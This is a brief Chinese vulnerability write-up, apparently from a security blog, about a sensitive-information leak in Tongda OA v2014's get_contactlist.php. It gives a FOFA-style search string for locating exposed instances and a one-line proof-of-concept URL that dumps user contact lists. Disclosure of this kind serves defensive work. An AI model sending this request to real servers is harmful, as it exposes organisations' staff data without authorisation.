通达OA v2014 get_contactlist.php 敏感信息泄漏漏洞

漏洞描述

通达OA v2014 get_contactlist.php文件存在信息泄漏漏洞,攻击者通过漏洞可以获取敏感信息,进一步攻击。

漏洞影响

通达OA v2014

网络测绘

app=”TDXK-通达OA”

漏洞复现

版本信息

20231123110212630-c2b8ec37-5f6e-4193-bec4-8bea5d27ef36 (1)

验证POC

/mobile/inc/get_contactlist.php?P=1&KWORD=%25&isuser_info=3

20231123110325550-1c813caa-a34b-4374-9c57-c59c6ccc4f34 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容